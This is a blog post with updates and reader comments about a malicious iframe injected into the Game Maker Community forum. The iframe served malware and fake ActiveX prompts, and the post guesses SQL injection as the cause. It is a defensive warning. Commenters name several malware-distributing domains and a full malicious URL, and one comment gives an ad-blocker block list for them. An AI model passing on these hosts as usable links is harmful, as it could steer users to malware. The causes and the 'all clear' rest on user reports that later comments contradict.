GMC Malware Attack

It’s not often that there is headline news for GM, but this story is unlikely to go down unnoticed.

According to several users on the GMC (which we will not link to for reasons explained below), a malicious piece of code has been embedded in the forum software code. The code, which allegedly creates an iframe that secretly loads a malicious website and downloads a virus is said to be found in every forum topic.

Until there are further developments on this story, we recommend that you DO NOT visit the GMC.

According to one user, Google Chrome warns users prior to visiting any GMC page to say that the site contains malicious code with a recommendation of not continuing. Internet Explorer on the other hand seems to be most affected by the attack (not surprisingly).

According to Phil Gamble on the Game Maker Blog, it may be possible that the forum code was altered by the use of a technique called ‘MySQL injection’ whereby a hacker finds a vulnerability in the website which allows him or her to modify or add new code directly into the forum’s database without needing Administration access to the whole forum itself.

KC, a moderator of the GMC, was quick to say users shouldn’t be too worried despite all the virus warning pop-ups users have reported. “yourtraff.biz [the malicious website] has been listed as a malware site before. It’s probably being generated by one of the advertisers on YYG. I wouldn’t worry too much about it.” Nevertheless, we recommend taking all pre-cautions necessary to ensure your computer’s safety.

Update: Thanks to NakedPaulToast, it appears the security flaw in the forum software that may have allowed this attack to occur has been identified, click here for more details. According to the website, a patch has been available

Update: One user warns that the virus is also affecting Firefox users, and that he/she received a warning from their anti-virus software to say a virus named “HTML:IFrame-BL [Trj]” had been detected.

Update: Screenshots from users:
Using Google Chrome from Jangos_Legacy
Using Internet Explorer & AVG from Jangos_Legacyo
Using Firefox & Google Toolbar from Revel

Update: For those who want to keep up to date with what’s happening, click here for the GMC virus topic in low-fi mode, this will allow you to view the topic without putting your computer at risk (at least for now).

Update: Internet Explorer users are reporting that the GMC is now asking to install an ActiveX control called “Microsoft works imaging server” from an unverified publisher. There is also a report that the website is automatically running Microsoft Outlook

Update: The Game Maker blog has been updated to confirm that the security vulnerability on the GMC still exists and the iframe is now loading different malicious websites to those from before. Until now, there hasn’t been any signs of major virus damage as the result of visiting the website, however if the URL continues to change, it’s probably only a matter of time before it forces dangerous executables to run on the end-users computer.

Update: Mark overmars is now reading the Virus and Malware releated topics on the GMC forum. As an administrator he has more control over the forum than other users and can choose to close the forum until it is safe for users to come back. It is unknown however if he has the server-side access required to patch the forum software to fix the security vulnerability.

Update: The GMC is reportedly now asking users to run and download various Java applets and Active-X controls which are damaging to your computer. Most of them say they are from “Microsoft” but the source is in fact from an unverified/unsigned publisher trying to mask itself under the company’s name.

Update: It appears things are just getting worse. As the end of the day closes (in North America), any attempt to access the GMC in Firefox is denied with a “Reported Attack Site!” message. Previously, this only happened to users who also had Google’s Firefox toolbar extension installed.

Update: The GMC has now been given the all clear by forum administrator chronic. It’s expected to take a couple of days before the google/firefox warnings clear – From my iPhone.

Advertisements

25 Responses

  1. thanks for posting this…
    note:

    I use IE7, and AVG anti virus, and it says that it has found a virus. IE7 also pops up some thingy too…

  2. Thanks for the news update. I was about to visit the GMC. I think I’ll keep my distance until it gets cleared up. It is nice to see that FF catches the site. I loved the little “Get me out of here!” on the Firefox one.
    Kind of crazy that a patch had been out for it already. Then again, Day zero attacks don’t happen that often, and I doubt that the GMC would really be consider worth a Day zero attack.

    -Elmernite

  3. @Elmernite, be warned Firefox doesn’t protect you from it. Only if you also happen to have the Google Toolbar installed are you protected.

  4. Well that’s just great… keep us up to date!

  5. yeah, it asked me to install somthing…

    and then it asked me to install somthing else justa moment ago… I declined both… and now, when I told AVG to heal the files, it said it couldn’t fing them! uh oh, I might have a problem. I will have to run a scan…
    I HOPE THEY DON”T CLOSE THE FORUM!!!!!!!!!!

  6. Ok thanks! I’ll just wait till everything is cleared before I go there anyway. Hasn’t this happened in the past?

    -Elmernite

  7. it probably has, but I never remember it being THIS serious. and thanks for the good advice PythonPoole, I did scan and I did find one virus and cleaned it.

    -Caniac

  8. I am using Firefox 3.0.1 and upon visiting the GMC received the same “Reported Attack Site” notice as Revel (I also have Google Toolbar installed– it came with FF 3). However, one of my friends that also uses the GMC uses FF 2 and didn’t receive a warning upon visiting the website (though I don’t know if he has Google Toolbar).

    McAfee SiteAdvisor didn’t report any malicious activity. There’s a Google Diagnostic Test on it, that can be found here: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://gmc.yoyogames.com/index.php .

    According to the Google Diagnostic Test, there are two domains distributing malware to the GMC: traffic-exchange.biz and rivatos.net .

    Not sure this will help (or if anyone already knows about this). Ah well.

    Hopefully the security hole will be fixed soon.

  9. One way to browse the gmc without those iframes would be by using Adblock Plus (a firefox extension) and adding the following values:

    http://rivatos.net*
    augreat.mine.nu/*
    traffic-exchange.biz/*

  10. I went there I didn’t get my computer harmed and I am running my anti virus, and starting a quick scan.

  11. You may think this is not serious – but it is! IT stopped my AVG from being able to update and only allowed to access to some sites. For example at the moment i am on a computer that I have not visited the GMC with and Google is working however on the other two computers that i have visisted the site in (IE7 on both and FF 3 on 1 and Chrome on both) and google and several othersites are not working! Doing a system restore at the moment. AVG says there is a threat but is not finding anything on a scan. This is very bad news. I can’t gurantee that the GMC crash has caused this but from my findings it could be a definite cause. My advice – Stay away from the GMC until further notice; update definitions and do a scan pronto; and keep watching on these blog sites for more updates.

    Cheers
    ~Qwertyuiop23

  12. Damn. This really sucks.

    I’m just glad that I was sleeping over the time when this got worse… But I did visit the gmc yeasterday for quite a few times. Is it possible that my computer could have been affected in any way? Should I run a virus scan (Antivir isn’t up-to-date, nothing really showed any trace of an attack)?

    Should’ve taken that ‘gmc viruses’ topic more seriously.

    Is there some source of information that’s up-to-date 24/7? I haven’t seen any official announcement on this at all. I hope there will be one (Yoyogames ought to do something about this).

  13. It really annoys me that there is nothing told about this virus on the yoyogames blog. I think that’s a big shame.

    You said it has given the all clear.
    So I assume it’s safe now. I don’t want to take a single risk.

  14. Great! Thanks for the update! Nice to know it’s all clear now.
    Now I can resume wasting my time on the GMC. I think I spent my time better when it was down.
    -Elmernite

  15. Is the forum software patched or is just the iframe removed and are we waiting for another iframe to appear?

  16. (BTW it would make sense to post the “clear message” on the Glog since I’m not visiting the GMC before I read that message)

  17. Weird firefox is still showing that it is blocking an iframe ( “http://inetppui.com/html/3767/90281401124fd0c93474c063e1cae5b4/ “)

  18. I never gave the GMC “the all clear”, i said i had removed the iframe. Another link to the virus/malware still existed but only just came to my attention. This has now been removed.

  19. It has been officially cleared now.
    So everything should be a go.
    -Elmernite

  20. nope it ain’t clearede up any more. see my brand new topic in “the Community”

    http://gmc.yoyogames.com/index.php?showtopic=396697

  21. officially cleared? who is this official?

  22. ah, nvm… the yyg blog.

  23. Woah. Thats freakin strange, every time my internet goes down, the GMC is hacked! xD My isp discontenued our service for some reason, the bill was paid, and when I found a place in the house where I could get internet from my laptop, I saw this topic! xP this has happend in the past too. Strange…

  24. Man it really suck how people do this sorta stuff

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: